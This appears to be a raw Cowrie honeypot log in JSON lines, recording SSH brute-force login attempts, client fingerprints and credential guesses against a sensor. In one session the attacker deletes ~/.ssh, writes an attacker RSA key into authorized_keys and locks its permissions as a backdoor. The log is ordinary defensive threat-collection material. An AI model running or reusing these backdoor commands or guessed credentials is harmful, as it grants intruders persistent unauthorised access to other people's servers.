{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:35:25.172493Z","src_ip":"213.6.203.226","session":"f34215a4136a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16266,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cf55deba0dd","protocol":"ssh","message":"New connection: 212.227.235.229:16266 (1.2.3.4:22) [session: 1cf55deba0dd]","sensor":"my-vps","timestamp":"2025-09-09T05:35:25.364155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:25.365038Z","src_ip":"212.227.235.229","session":"1cf55deba0dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:25.619130Z","src_ip":"212.227.235.229","session":"1cf55deba0dd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.241596Z","src_ip":"213.6.203.226","session":"f34215a4136a"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":57670,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b0d218a173d","protocol":"ssh","message":"New connection: 213.6.203.226:57670 (1.2.3.4:22) [session: 7b0d218a173d]","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.308177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.309434Z","src_ip":"213.6.203.226","session":"7b0d218a173d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.377185Z","src_ip":"213.6.203.226","session":"7b0d218a173d"}
{"eventid":"cowrie.login.failed","username":"test3","password":"1234567","message":"login attempt [test3/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.676929Z","src_ip":"212.227.235.229","session":"1cf55deba0dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.690250Z","src_ip":"213.6.203.226","session":"7b0d218a173d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.759173Z","src_ip":"213.6.203.226","session":"09dedfb5ae70"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:26.760229Z","src_ip":"213.6.203.226","session":"7b0d218a173d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:35:27.934524Z","src_ip":"212.227.235.229","session":"1cf55deba0dd"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":52148,"dst_ip":"1.2.3.4","dst_port":22,"session":"68ce1099ae47","protocol":"ssh","message":"New connection: 92.118.39.62:52148 (1.2.3.4:22) [session: 68ce1099ae47]","sensor":"my-vps","timestamp":"2025-09-09T05:36:09.174975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:36:09.175905Z","src_ip":"92.118.39.62","session":"68ce1099ae47"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:36:09.205558Z","src_ip":"92.118.39.62","session":"68ce1099ae47"}
{"eventid":"cowrie.login.failed","username":"arkserver","password":"123456","message":"login attempt [arkserver/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T05:36:09.296258Z","src_ip":"92.118.39.62","session":"68ce1099ae47"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:10.337210Z","src_ip":"92.118.39.62","session":"68ce1099ae47"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":43084,"dst_ip":"1.2.3.4","dst_port":22,"session":"81053c5193b0","protocol":"ssh","message":"New connection: 213.6.203.226:43084 (1.2.3.4:22) [session: 81053c5193b0]","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.013565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.014463Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.080516Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2xsw","message":"login attempt [root/1qaz2xsw] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.389355Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:36:30.537183Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.538063Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.539167Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.606271Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:36:30.845221Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.845941Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.914201Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.915222Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":46422,"dst_ip":"1.2.3.4","dst_port":22,"session":"6029f1c26fbe","protocol":"ssh","message":"New connection: 213.6.203.226:46422 (1.2.3.4:22) [session: 6029f1c26fbe]","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.979372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:36:30.980761Z","src_ip":"213.6.203.226","session":"6029f1c26fbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:36:31.052418Z","src_ip":"213.6.203.226","session":"6029f1c26fbe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:36:31.322652Z","src_ip":"213.6.203.226","session":"6029f1c26fbe"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.391093Z","src_ip":"213.6.203.226","session":"6029f1c26fbe"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":53270,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce2dfbb1672","protocol":"ssh","message":"New connection: 213.6.203.226:53270 (1.2.3.4:22) [session: cce2dfbb1672]","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.456011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.456684Z","src_ip":"213.6.203.226","session":"cce2dfbb1672"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.522868Z","src_ip":"213.6.203.226","session":"cce2dfbb1672"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.836751Z","src_ip":"213.6.203.226","session":"cce2dfbb1672"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.907934Z","src_ip":"213.6.203.226","session":"81053c5193b0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:32.908882Z","src_ip":"213.6.203.226","session":"cce2dfbb1672"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64492,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab4480c9361c","protocol":"ssh","message":"New connection: 212.227.235.229:64492 (1.2.3.4:22) [session: ab4480c9361c]","sensor":"my-vps","timestamp":"2025-09-09T05:36:53.048196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:36:53.049106Z","src_ip":"212.227.235.229","session":"ab4480c9361c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:36:53.175607Z","src_ip":"212.227.235.229","session":"ab4480c9361c"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T05:36:53.713988Z","src_ip":"212.227.235.229","session":"ab4480c9361c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:36:54.857090Z","src_ip":"212.227.235.229","session":"ab4480c9361c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44824,"dst_ip":"1.2.3.4","dst_port":23,"session":"4520e413c54b","protocol":"telnet","message":"New connection: 212.227.125.160:44824 (1.2.3.4:23) [session: 4520e413c54b]","sensor":"my-vps","timestamp":"2025-09-09T05:37:04.286723Z"}
{"eventid":"cowrie.session.closed","duration":13.088269472122192,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:37:17.374893Z","src_ip":"212.227.125.160","session":"4520e413c54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:37:35.922403Z","src_ip":"212.227.125.160","session":"3b9f77ddd1d7"}
{"eventid":"cowrie.session.closed","duration":180.150057554245,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:37:35.927421Z","src_ip":"212.227.125.160","session":"3b9f77ddd1d7"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":61789,"dst_ip":"1.2.3.4","dst_port":22,"session":"1de03ea07b65","protocol":"ssh","message":"New connection: 213.6.203.226:61789 (1.2.3.4:22) [session: 1de03ea07b65]","sensor":"my-vps","timestamp":"2025-09-09T05:37:37.922204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:37:37.922890Z","src_ip":"213.6.203.226","session":"1de03ea07b65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:37:37.991291Z","src_ip":"213.6.203.226","session":"1de03ea07b65"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345678","message":"login attempt [test/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T05:37:38.306974Z","src_ip":"213.6.203.226","session":"1de03ea07b65"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:37:39.377080Z","src_ip":"213.6.203.226","session":"1de03ea07b65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49394,"dst_ip":"1.2.3.4","dst_port":22,"session":"5324dfce3ec0","protocol":"ssh","message":"New connection: 212.227.235.229:49394 (1.2.3.4:22) [session: 5324dfce3ec0]","sensor":"my-vps","timestamp":"2025-09-09T05:38:12.031334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:38:12.033684Z","src_ip":"212.227.235.229","session":"5324dfce3ec0"}
